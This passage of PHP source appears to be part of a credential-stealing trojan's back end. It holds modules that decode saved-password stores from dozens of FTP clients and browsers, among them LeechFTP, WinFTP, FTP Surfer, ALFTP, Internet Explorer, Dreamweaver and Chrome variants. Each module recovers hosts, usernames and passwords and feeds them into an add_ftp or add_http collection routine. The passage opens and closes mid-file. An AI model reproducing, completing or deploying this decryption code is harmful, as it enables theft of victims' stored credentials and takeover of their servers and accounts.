5995. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
5996. // Mozilla Suite Browser 1.x
5997.  
5998. class module_mozilla extends module_mozilla_base
5999. {
6000. }
6001.  
6002. // =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
6003. // LeechFTP 1.3
6004.  
6005. class stream_leechftp extends stream
6006. {
6007. function read_bytestring()
6008. {
6009. if (!$this->state)
6010. return false;
6011. $len = $this->read_byte();
6012. if (!$this->state)
6013. return false;
6014. return $this->read_strlen($len);
6015. }
6016.  
6017. function read_crypted_string()
6018. {
6019. $encrypted_string = $this->read_str();
6020. if (!$this->state)
6021. return false;
6022. $CryptoKey = array(0x77, 0xc9, 0xf4, 0x35);
6023. for ($i = 0; $i < strlen($encrypted_string); $i++)
6024. {
6025. $encrypted_string[$i] = chr(ord($encrypted_string[$i]) ^ $CryptoKey[$i % count($CryptoKey)]);
6026. }
6027. return $encrypted_string;
6028. }
6029. }
6030.  
6031. class module_leechftp extends module
6032. {
6033. private function read_ftp_item($stream)
6034. {
6035. $host = $stream->read_crypted_string(); // host
6036. $user = $stream->read_crypted_string(); // user
6037. $pass = $stream->read_crypted_string(); // pass
6038. $stream->read_crypted_string(); // bookmark name
6039. $stream->read_crypted_string(); // local dir
6040. $dir = $stream->read_crypted_string(); // remote dir
6041. $stream->read_crypted_string(); // bookmark secure password
6042. $port = $stream->read_word();
6043. $stream->read_skip(11);
6044.  
6045. $this->add_ftp(append_port_dir($host, $port, $dir), $user, $pass);
6046. }
6047.  
6048. private function read_ftp_dir($stream)
6049. {
6050. $dir_name = $stream->read_bytestring();
6051. $stream->read_skip(0x100-1-strlen($dir_name)); // non-used dir_name padding
6052. $stream->read_skip(4); // recursion level dword
6053. $siblings = $stream->read_dword();
6054. return $siblings;
6055. }
6056.  
6057. protected function process_dat_file($file_data)
6058. {
6059. if (!strlen($file_data))
6060. return false;
6061.  
6062. $stream = new stream_leechftp($file_data, $this->log);
6063.  
6064. if ($stream->read_bytestring() !== 'LeechFTP Bookmark File.'.chr(0x1a))
6065. {
6066. $this->log->add('ERR_INVALID_LEECHFTP_DATFILE');
6067. return false;
6068. }
6069.  
6070. $dat_version = $stream->read_word();
6071. if ($dat_version != 0x1005)
6072. {
6073. $this->log->add('ERR_INVALID_LEECHFTP_DAT_VERSION: 0x'.dechex($dat_version));
6074. return false;
6075. }
6076.  
6077. while ($stream->state && !$stream->eof())
6078. {
6079. $siblings = $this->read_ftp_dir($stream);
6080. if (!$stream->state)
6081. break;
6082. while ($stream->state && !$stream->eof() && $siblings--)
6083. {
6084. $this->read_ftp_item($stream);
6085. }
6086. }
6087. return $stream->state;
6088. }
6089.  
6090. public function import_item($stream, $id)
6091. {
6092. switch ($id)
6093. {
6094. case 0x0000:
6095. // bookmark.dat files
6096. $this->process_dat_file($stream->read_str());
6097. break;
6098. default:
6099. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
6100. return false;
6101. }
6102. return true;
6103. }
6104. }
6105.  
6106. // =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
6107. // Odin Secure FTP Expert
6108.  
6109. class module_odin extends module
6110. {
6111. protected function process_qfp_file($value)
6112. {
6113. if (!strlen($value))
6114. return;
6115.  
6116. while (strlen($value) > (0x104+0x38+0x32+0x32+0x104+12))
6117. {
6118. ztrim(substr($value, 0, 0x104)); // site name
6119. $value = substr($value, 0x104);
6120. $url = ztrim(substr($value, 0, 0x38));
6121. $value = substr($value, 0x38);
6122. $user = ztrim(substr($value, 0, 0x32));
6123. $value = substr($value, 0x32);
6124. $pass = ztrim(substr($value, 0, 0x32));
6125. $value = substr($value, 0x32);
6126. $dir = ztrim(substr($value, 0, 0x104));
6127. $value = substr($value, 0x104);
6128. ztrim(substr($value, 0, 0x104+12)); // local dir
6129. $value = substr($value, 0x104+12);
6130.  
6131. $this->add_ftp(append_dir($url, $dir), $user, $pass);
6132. }
6133. }
6134.  
6135. public function import_item($stream, $id)
6136. {
6137. switch ($id)
6138. {
6139. case 0x0000:
6140. $this->process_qfp_file($stream->read_str());
6141. break;
6142. default:
6143. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
6144. return false;
6145. }
6146. return true;
6147. }
6148. }
6149.  
6150. // =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
6151. // WinFTP 1.6.8
6152.  
6153. class module_winftp extends module
6154. {
6155. private function decrypt($encrypted_data)
6156. {
6157. $decrypted_data = '';
6158. for ($i = 0; $i < strlen($encrypted_data); $i++)
6159. $decrypted_data .= chr((ord($encrypted_data[$i]) >> 4) | ((ord($encrypted_data[$i]) & 0xf) << 4));
6160. return $decrypted_data;
6161. }
6162.  
6163. private function read_site($stream)
6164. {
6165. $len = $stream->read_dword();
6166. $site = $this->decrypt($stream->read_str());
6167. $host = $this->decrypt($stream->read_str());
6168. $user = $this->decrypt($stream->read_str());
6169. $pass = $this->decrypt($stream->read_str());
6170. $port = $stream->read_dword();
6171. $dir = $this->decrypt($stream->read_str());
6172. $note = $this->decrypt($stream->read_str());
6173.  
6174. $stream->read_skip($len-strlen($site)-strlen($host)-strlen($user)-strlen($pass)-strlen($dir)-strlen($note)-4*7);
6175. $this->add_ftp(append_port_dir($host, $port, $dir), $user, $pass);
6176. }
6177.  
6178. protected function process_dat_file($value)
6179. {
6180. if (strlen($value) <= 10)
6181. return;
6182.  
6183. $stream = new stream($value, $this->log);
6184. $stream->read_skip(10);
6185. while ($stream->state && !$stream->eof())
6186. {
6187. $this->read_site($stream);
6188. }
6189. }
6190.  
6191. public function import_item($stream, $id)
6192. {
6193. switch ($id)
6194. {
6195. case 0x0000:
6196. $this->process_dat_file($stream->read_str());
6197. break;
6198. default:
6199. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
6200. return false;
6201. }
6202. return true;
6203. }
6204. }
6205.  
6206. // =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
6207. // FTP Surfer 1.0.7
6208.  
6209. class module_ftp_surfer extends module
6210. {
6211. private function decrypt($encrypted_data)
6212. {
6213. if (strlen($encrypted_data) <= 6)
6214. return '';
6215.  
6216. $crypt_word = substr($encrypted_data, 4, 2);
6217. $crypt_word = hextostr($crypt_word);
6218. if ($crypt_word === false)
6219. {
6220. $this->log->add('ERR_CANNOT_DECRYPT_PASSWORD');
6221. return '';
6222. }
6223.  
6224. $crypt_word = ord($crypt_word[0]);
6225.  
6226. $encrypted_data = substr($encrypted_data, 0, 4).substr($encrypted_data, 6);
6227. $subst_array = '3A72C81FD94E650B-';
6228. $magic = 0;
6229.  
6230. for ($i = 0; $i < strlen($encrypted_data); $i++)
6231. {
6232. if ($i == 4 || $i == 0)
6233. {
6234. $magic = $crypt_word;
6235. }
6236. $magic = hexdec(gmp_strval(gmp_and(gmp_add(gmp_mul("$magic", "0x343FD"), "0x269EC3"), "0xffffffff"), 16));
6237. $rand_result = ((($magic >> 16) & 0x7fff) & 0xf);
6238.  
6239. if ($encrypted_data[$i] == 'G')
6240. $encrypted_data[$i] = '-';
6241.  
6242. $pos = strpos($subst_array, $encrypted_data[$i])+1;
6243. if ($pos === false)
6244. {
6245. $this->log->add('ERR_CANNOT_DECRYPT_PASSWORD');
6246. return '';
6247. }
6248.  
6249. $pos -= $rand_result;
6250. if ($pos < 0)
6251. $pos += 17;
6252.  
6253. $encrypted_data[$i] = $subst_array[$pos-1];
6254. }
6255.  
6256. $result_len = hexdec(substr($encrypted_data, 0, 4));
6257. $encrypted_data = substr($encrypted_data, 4); // cut password length
6258. $result = hextostr($encrypted_data); // hex-decode decrypted password data
6259.  
6260. if ($result === false)
6261. {
6262. $this->log->add('ERR_CANNOT_DECRYPT_PASSWORD');
6263. return '';
6264. }
6265.  
6266. if (strlen($result) != $result_len)
6267. {
6268. $this->log->add('ERR_CANNOT_DECRYPT_PASSWORD');
6269. return '';
6270. }
6271.  
6272. return $result;
6273. }
6274.  
6275. private function read_param($stream, &$id, &$data)
6276. {
6277. /* @var $stream stream */
6278. $id = $stream->read_dword();
6279. $stream->read_dword(); // item type
6280. $data = $stream->read_str();
6281. return 4+4+4+strlen($data);
6282. }
6283.  
6284. protected function process_dat_file($value)
6285. {
6286. if (strlen($value) <= 0x25)
6287. return;
6288.  
6289. $stream = new stream($value, $this->log);
6290. $file_ver = ztrim($stream->read_strlen(0x25));
6291. if ($file_ver != 'C87BC961-AAF9-11d2-8A80-0080ADB32FF4')
6292. {
6293. $this->log->add('ERR_INVALID_FTP_SURFER_DB_FILE');
6294. return;
6295. }
6296. while ($stream->state && !$stream->eof())
6297. {
6298. $len = $stream->read_dword();
6299. $host = '';
6300. $user = '';
6301. $pass = '';
6302. $dir = '';
6303. $port = '';
6304.  
6305. while ($stream->state && $len > 0)
6306. {
6307. $id = '';
6308. $data = '';
6309. $len -= $this->read_param($stream, $id, $data);
6310. switch ($id)
6311. {
6312. case 3: $host = $data; break;
6313. case 5: $user = $this->decrypt($data); break;
6314. case 6: $pass = $this->decrypt($data); break;
6315. case 7: $dir = $data; break;
6316. case 8: $port = $data; break;
6317. }
6318. }
6319. $this->add_ftp(append_port_dir($host, $port, $dir), $user, $pass);
6320. }
6321. }
6322.  
6323. public function import_item($stream, $id)
6324. {
6325. switch ($id)
6326. {
6327. case 0x0000:
6328. $this->process_dat_file($stream->read_str());
6329. break;
6330. default:
6331. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
6332. return false;
6333. }
6334. return true;
6335. }
6336. }
6337.  
6338. // =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
6339. // FTPGetter 3
6340.  
6341. class module_ftpgetter extends module
6342. {
6343. protected function read_xml_item($xml_array)
6344. {
6345. $host = Utf8ToWin(assign($xml_array['server_ip']));
6346. $user = Utf8ToWin(assign($xml_array['server_user_name']));
6347. $pass = Utf8ToWin(assign($xml_array['server_user_password']));
6348. $port = Utf8ToWin(assign($xml_array['server_port']));
6349. $protocol = assign($xml_array['protocol_type']);
6350.  
6351. $this->add_ftp(append_port(ftp_force_ssh($host, $protocol == '3'), $port), $user, $pass);
6352.  
6353. foreach ($xml_array as $value)
6354. {
6355. if (is_array($value))
6356. $this->read_xml_item($value);
6357. }
6358. }
6359.  
6360. protected function rec_scan_xml_array($xml_array)
6361. {
6362. foreach ($xml_array as $key=>$value)
6363. {
6364. if (is_array($value))
6365. {
6366. if (strval($key) == 'server')
6367. $this->read_xml_item($value);
6368. $this->rec_scan_xml_array($value);
6369. }
6370. }
6371. }
6372.  
6373. protected function process_xml($value)
6374. {
6375. if (!strlen($value))
6376. return;
6377.  
6378. $xml_parser = new XMLParser($value);
6379. $parsed_xml = $xml_parser->parse();
6380. if (!$xml_parser->isError || is_array($parsed_xml))
6381. {
6382. $this->rec_scan_xml_array($parsed_xml);
6383. } else
6384. {
6385. $this->log->add("ERR_XML_PARSE");
6386. }
6387. }
6388.  
6389. public function import_item($stream, $id)
6390. {
6391. switch ($id)
6392. {
6393. case 0x0000:
6394. $this->process_xml($stream->read_str());
6395. break;
6396. default:
6397. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
6398. return false;
6399. }
6400. return true;
6401. }
6402. }
6403.  
6404. // =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
6405. // ALFTP 5
6406.  
6407. class module_alftp extends module
6408. {
6409. private function decrypt($encrypted_password)
6410. {
6411. $encrypted_password = trim($encrypted_password);
6412. if (!strlen($encrypted_password))
6413. return '';
6414.  
6415. $encrypted_password = int3tostr($encrypted_password);
6416.  
6417. $c = 0x12;
6418. for ($i = 0; $i < strlen($encrypted_password); $i++)
6419. {
6420. $k = ord($encrypted_password[$i]);
6421. $encrypted_password[$i] = chr(ord($encrypted_password[$i]) ^ ($c >> 8));
6422. $c = _BF_ADD32($k, $c);
6423. $c = _BF_ADD32($c, $c);
6424. $c = _BF_ADD32($c, 4);
6425. }
6426. return $encrypted_password;
6427. }
6428.  
6429. protected function process_ini_file($file_contents)
6430. {
6431. if (strlen($file_contents) <= 4)
6432. return;
6433.  
6434. $parsed_ini = parse_ini($file_contents);
6435.  
6436. foreach ($parsed_ini as $section_name=>$section)
6437. {
6438. if (!is_array($section))
6439. continue;
6440. $host = assign($section["url"]);
6441. if (!strlen($host))
6442. $host = $section_name;
6443. $user = assign($section["id"]);
6444. $pass = assign($section["encrypt_pw"]);
6445. if (!strlen($pass))
6446. {
6447. $pass = assign($section["pw"]);
6448. }
6449. $pass = $this->decrypt($pass);
6450. $dir = assign($section["homedir"]);
6451. $port = assign($section["port"]);
6452. $protocol = assign($section["protocol"]);
6453. $this->add_ftp(append_port_dir(ftp_force_ssh($host, $protocol == '1'), $port, $dir), $user, $pass);
6454. }
6455. }
6456.  
6457. public function import_item($stream, $id)
6458. {
6459. switch ($id)
6460. {
6461. case 0x0000:
6462. $this->process_ini_file($stream->read_str());
6463. break;
6464. default:
6465. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
6466. return false;
6467. }
6468. return true;
6469. }
6470. }
6471.  
6472. // =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
6473. // IE4-IE6
6474.  
6475. class module_ie extends module
6476. {
6477. // FTP and Basic Auth
6478. // FTP passwords ($item_name contains ftp://) are always unicode, stored in $item_value
6479. // Basic Auth passwords are stored as ansi values in $item_value (user:pass string)
6480. protected function process_ftp_item($item_name, $item_value, $is_ie7 = false)
6481. {
6482. if (!strlen($item_name) || !strlen($item_value))
6483. return;
6484.  
6485. if ($is_ie7)
6486. {
6487. // IE7+ ansi names
6488. $item_name = ztrim($item_name);
6489. }
6490. else
6491. {
6492. // IE4-6 unicode names
6493. $item_name = Utf8ToWin(unicode_to_utf8(ztrim_unicode($item_name)));
6494. }
6495.  
6496. $item_name = str_replace('DPAPI: ', '', $item_name);
6497. $item_name = str_replace('Microsoft_WinInet_', '', $item_name);
6498.  
6499. if (str_begins($item_name, 'ftp://'))
6500. {
6501. // IE4-6 ftp passwords
6502. $item_value = Utf8ToWin(unicode_to_utf8(ztrim_unicode($item_value)));
6503. $this->add_ftp($item_name, '', $item_value);
6504. } else
6505. {
6506. // Basic Auth passwords
6507. if ($is_ie7)
6508. {
6509. // IE7+ values are stored as unicode
6510. $item_value = Utf8ToWin(unicode_to_utf8(ztrim_unicode($item_value)));
6511. }
6512. else
6513. {
6514. // IE4-6 values are stored as ansi
6515. $item_value = ztrim($item_value);
6516. }
6517. if (strpos($item_value, ':') !== false)
6518. {
6519. list($user, $pass) = explode(':', $item_value, 2);
6520. $this->add_http($item_name, $user, $pass);
6521. }
6522. }
6523. }
6524.  
6525. protected function check_ps_index($data)
6526. {
6527. if (!strlen($data))
6528. return false;
6529.  
6530. $stream = new stream($data, $this->log);
6531.  
6532. // WICK
6533. if ($stream->read_dword() != 0x4b434957)
6534. {
6535. $this->log->add("ERR_INVALID_PS_INDEX_HEADER");
6536. return false;
6537. }
6538.  
6539. $stream->read_dword(); // index size
6540. $str_num = $stream->read_dword();
6541. $stream->read_skip(12); // flags + alignment
6542.  
6543. if (($str_num * (4+8+4) + 24) != strlen($data))
6544. {
6545. return false;
6546. }
6547.  
6548. return $stream->state;
6549. }
6550.  
6551. protected function read_ps_data($url, $index_data, $ps_data)
6552. {
6553. if (!strlen($index_data) || !strlen($ps_data))
6554. {
6555. return;
6556. }
6557.  
6558. if (!$this->check_ps_index($index_data))
6559. {
6560. $this->log->add("ERR_INVALID_PS_INDEX");
6561. return;
6562. }
6563.  
6564. $stream_index = new stream($index_data, $this->log);
6565. $stream_index->read_skip(8);
6566. $str_num = $stream_index->read_dword();
6567. $stream_index->read_skip(12); // flags + alignment
6568.  
6569. $count = 0;
6570. $prev_str = '';
6571. while ($stream_index->state && $str_num--)
6572. {
6573. $str_ofs = $stream_index->read_dword();
6574. $stream_index->read_skip(8);
6575. $str_len = $stream_index->read_dword();
6576.  
6577. $str = substr($ps_data, $str_ofs, $str_len*2+2);
6578. $str = Utf8ToWin(unicode_to_utf8(ztrim_unicode($str)));
6579. if (($count % 2) == 0)
6580. $prev_str = $str;
6581. else
6582. {
6583. if (str_begins($url, 'http://') || str_begins($url, 'https://'))
6584. $this->add_http($url, $prev_str, $str);
6585. }
6586. $count++;
6587. }
6588. }
6589.  
6590. protected function process_ps_data($url, $data)
6591. {
6592. if (!strlen($data))
6593. return;
6594.  
6595. $url = Utf8ToWin(unicode_to_utf8(ztrim_unicode($url)));
6596. if (!strlen($url))
6597. return;
6598.  
6599. $stream = new stream($data, $this->log);
6600. $stream->read_skip(4);
6601. $index_len = $stream->read_dword();
6602. $stream->read_skip(4);
6603. $index_data = $stream->read_strlen($index_len);
6604. $ps_data = $stream->read_strlen(strlen($data)-12-$index_len);
6605.  
6606. if (!$stream->state)
6607. return;
6608.  
6609. $this->read_ps_data($url, $index_data, $ps_data);
6610. }
6611.  
6612. protected $ps_list_index = array();
6613. protected $ps_list_data = array();
6614.  
6615. protected function push_ps_value($name, $value)
6616. {
6617. if (!str_begins($name, 'http://') && !str_begins($name, 'https://'))
6618. return;
6619.  
6620. $pos = strpos($name, ':StringData');
6621. if ($pos !== false)
6622. {
6623. $name = substr($name, 0, $pos);
6624. $this->ps_list_data[$name] = $value;
6625. } else
6626. {
6627. $pos = strpos($name, ':StringIndex');
6628. if ($pos !== false)
6629. {
6630. $name = substr($name, 0, $pos);
6631. $this->ps_list_index[$name] = $value;
6632. }
6633. }
6634.  
6635. if ($pos !== false && isset($this->ps_list_index[$name]) && isset($this->ps_list_data[$name]))
6636. {
6637. $this->read_ps_data($name, $this->ps_list_index[$name], $this->ps_list_data[$name]);
6638. }
6639. }
6640.  
6641. protected function process_ie6($name, $value)
6642. {
6643. if (!strlen($value))
6644. return;
6645.  
6646. $name = Utf8ToWin(unicode_to_utf8(ztrim_unicode($name)));
6647. if (!strlen($name))
6648. return;
6649.  
6650. $this->push_ps_value($name, $value);
6651. }
6652.  
6653. public function import_item($stream, $id)
6654. {
6655. switch ($id)
6656. {
6657. case 0x0000:
6658. case 0x0001:
6659. // forms & auto complete IE4-6
6660. $item_name = $stream->read_str();
6661. $item_value = $stream->read_str();
6662. $this->process_ie6($item_name, $item_value);
6663. break;
6664. case 0x0002:
6665. // ftp & basic auth
6666. $item_name = $stream->read_str();
6667. $item_value = $stream->read_str();
6668. $this->process_ftp_item($item_name, $item_value);
6669. break;
6670. case 0x0003:
6671. // IE7 forms
6672. $url = $stream->read_str(); // url
6673. $value = $stream->read_str(); // ps_value
6674. $this->process_ps_data($url, $value);
6675. break;
6676. case 0x0004:
6677. // IE7 basic auth + ftp
6678. $item_name = $stream->read_str();
6679. $item_value = $stream->read_str();
6680. $this->process_ftp_item($item_name, $item_value, true);
6681. break;
6682. default:
6683. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
6684. return false;
6685. }
6686. return true;
6687. }
6688. }
6689.  
6690. // =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
6691. // Dreamweaver CS5
6692.  
6693. class module_dreamweaver extends module
6694. {
6695. public function import_item($stream, $id)
6696. {
6697. switch ($id)
6698. {
6699. case 0x0000:
6700. case 0x0010:
6701. $host = $stream->read_str();
6702. $stream->read_str(); // Linked URL: http://...
6703. $dir = $stream->read_str();
6704. $user = Utf8ToWin($stream->read_str());
6705. $pass = Utf8ToWin($stream->read_str());
6706. if (($id & 0x10) > 0)
6707. $is_ssh = $stream->read_dword();
6708. else
6709. $is_ssh = 0;
6710. $this->add_ftp(append_dir(ftp_force_ssh($host, $is_ssh == 1), $dir), $user, $pass);
6711. break;
6712. default:
6713. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
6714. return false;
6715. }
6716. return true;
6717. }
6718. }
6719.  
6720. // =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
6721. // DeluxeFTP 6
6722.  
6723. class module_deluxeftp extends module
6724. {
6725. protected function read_xml_item($xml_array)
6726. {
6727. $host = utf8_decode(assign($xml_array['ADDRESS']));
6728. $user = utf8_decode(assign($xml_array['LOGIN']));
6729. $pass = utf8_decode(assign($xml_array['PASSWORD']));
6730. $port = utf8_decode(assign($xml_array['PORT']));
6731. $dir = utf8_decode(assign($xml_array['REMOTEPATH']));
6732.  
6733. $this->add_ftp(append_port_dir($host, $port, $dir), $user, $pass);
6734.  
6735. foreach ($xml_array as $value)
6736. {
6737. if (is_array($value))
6738. $this->read_xml_item($value);
6739. }
6740. }
6741.  
6742. protected function rec_scan_xml_array($xml_array)
6743. {
6744. foreach ($xml_array as $key=>$value)
6745. {
6746. if (is_array($value))
6747. {
6748. if (strval($key) == 'SITE')
6749. $this->read_xml_item($value);
6750. $this->rec_scan_xml_array($value);
6751. }
6752. }
6753. }
6754.  
6755. protected function process_xml($value)
6756. {
6757. if (!strlen($value))
6758. return;
6759.  
6760. $xml_parser = new XMLParser($value);
6761. $parsed_xml = $xml_parser->parse();
6762. if (!$xml_parser->isError || is_array($parsed_xml))
6763. {
6764. $this->rec_scan_xml_array($parsed_xml);
6765. } else
6766. {
6767. $this->log->add("ERR_XML_PARSE");
6768. }
6769. }
6770.  
6771. public function import_item($stream, $id)
6772. {
6773. switch ($id)
6774. {
6775. case 0x0000:
6776. $xml_file = $stream->read_str();
6777. $this->process_xml($xml_file);
6778. break;
6779. default:
6780. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
6781. return false;
6782. }
6783. return true;
6784. }
6785. }
6786.  
6787. // =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
6788. // Google Chrome
6789.  
6790. class module_chrome_base extends module
6791. {
6792. public function import_item($stream, $id)
6793. {
6794. switch ($id)
6795. {
6796. case 0x0000:
6797. $encoding = $stream->read_dword();
6798. $url = $stream->read_str();
6799. $user = $stream->read_str();
6800. $pass = $stream->read_str();
6801.  
6802. if ($encoding == 1)
6803. {
6804. if (str_begins($url, 'http://') || str_begins($url, 'https://'))
6805. $this->add_http(Utf8ToWin($url), Utf8ToWin($user), Utf8ToWin($pass));
6806. else
6807. $this->add_ftp(Utf8ToWin($url), Utf8ToWin($user), Utf8ToWin($pass));
6808. } else
6809. {
6810. $this->log->add("ERR_INVALID_SQLITE_ENCODING");
6811. }
6812. break;
6813. default:
6814. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
6815. return false;
6816. }
6817. return true;
6818. }
6819. }
6820.  
6821. class module_chrome extends module_chrome_base
6822. {
6823. }
6824.  
6825. // =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
6826. // Google Chromium & SRWare Iron
6827.  
6828. class module_chromium extends module_chrome_base
6829. {
6830. }
6831.  
6832. // =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
6833. // ChromePlus
6834.  
6835. class module_chromeplus extends module_chrome_base
6836. {
6837. }
6838.  
6839. // =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
6840. // Bromium
6841.  
6842. class module_bromium extends module_chrome_base
6843. {
6844. }
6845.  
6846. // =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
6847. // Nichrome
6848.  
6849. class module_nichrome extends module_chrome_base
6850. {
6851. }
6852.  
6853. // =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
6854. // Comodo Dragon
6855.  
6856. class module_comododragon extends module_chrome_base
6857. {
6858. }
6859.  
6860. // =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
6861. // Comodo Dragon
6862.  
6863. class module_rockmelt extends module_chrome_base
6864. {
6865. }
6866.  
6867. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
6868. // K-Meleon
6869.  
6870. class module_kmeleon extends module_mozilla_base
6871. {
6872. }
6873.  
6874. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
6875. // Epic
6876.  
6877. class module_epic extends module_mozilla_base
6878. {
6879. }
6880.  
6881. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
6882. // Staff-FTP
6883.  
6884. class module_staff extends module
6885. {
6886. private function decrypt($encrypted_password)
6887. {
6888. $k = 1;
6889. $decrypted_password = '';
6890. for ($i = 0; $i < int_divide(strlen($encrypted_password), 2); $i++, $k++)
6891. {
6892. $decrypted_password .= chr((ord($encrypted_password[$i*2]) >> 1) + ord($encrypted_password[$i*2+1]) - $k);
6893. }
6894. return $decrypted_password;
6895. }
6896.  
6897. protected function process_ini($ini_contents)
6898. {
6899. $parsed_ini = parse_ini($ini_contents);
6900. foreach ($parsed_ini as $section)
6901. {
6902. if (!is_array($section))
6903. continue;
6904. $host = assign($section["host"]);
6905. $user = assign($section["login"]);
6906. $pass = $this->decrypt(assign($section["password"]));
6907. $port = assign($section["port"]);
6908. $dir = assign($section["remote path"]);
6909.  
6910. $this->add_ftp(append_port_dir($host, $port, $dir), $user, $pass);
6911. }
6912. }
6913.  
6914. public function import_item($stream, $id)
6915. {
6916. switch ($id)
6917. {
6918. case 0x0000:
6919. $ini_contents = $stream->read_str();
6920. $this->process_ini($ini_contents);
6921. break;
6922. default:
6923. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
6924. return false;
6925. }
6926. return true;
6927. }
6928. }
6929.  
6930. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
6931. // AceFTP
6932.  
6933. class stream_ace extends stream
6934. {
6935. function read_ace_str()
6936. {
6937. if (!$this->state)
6938. return false;
6939. return $this->read_strlen($this->read_byte());
6940. }
6941.  
6942. function read_ace_data()
6943. {
6944. if (!$this->state)
6945. return false;
6946. return $this->read_strlen($this->read_dword());
6947. }
6948.  
6949. function read_ace_uni_str()
6950. {
6951. if (!$this->state)
6952. return false;
6953. return $this->read_strlen($this->read_dword()*2);
6954. }
6955.  
6956. function read_data(&$l)
6957. {
6958. $item_type = $this->read_byte();
6959. if (!$this->state)
6960. return '';
6961.  
6962. $l = true;
6963. switch ($item_type)
6964. {
6965. case 0:
6966. // List End
6967. $l = false;
6968. break;
6969. case 1:
6970. // List Start
6971. $x = true;
6972. $out = array();
6973. while ($this->state)
6974. {
6975. $list_value = $this->read_data($x);
6976. if (!$x || !$this->state)
6977. break;
6978. array_push($out, $list_value);
6979. }
6980.  
6981. return $out;
6982. break;
6983. case 2:
6984. return $this->read_byte();
6985. break;
6986. case 3:
6987. return $this->read_word();
6988. break;
6989. case 4:
6990. // GUESS
6991. return $this->read_dword();
6992. break;
6993. case 5:
6994. $this->read_skip(10); // DateTime
6995. break;
6996. case 6:
6997. case 7:
6998. return $this->read_ace_str();
6999. break;
7000. case 8:
7001. return true;
7002. break;
7003. case 9:
7004. return false;
7005. break;
7006. case 11:
7007. // String List
7008. while ($this->state && $this->read_ace_str())
7009. {
7010. }
7011. break;
7012. case 10:
7013. case 12:
7014. return $this->read_ace_data();
7015. break;
7016. case 18:
7017. // UNICODE
7018. return Utf8ToWin(unicode_to_utf8($this->read_ace_uni_str()));
7019. break;
7020. case 19:
7021. $this->read_skip(8); // Int64
7022. break;
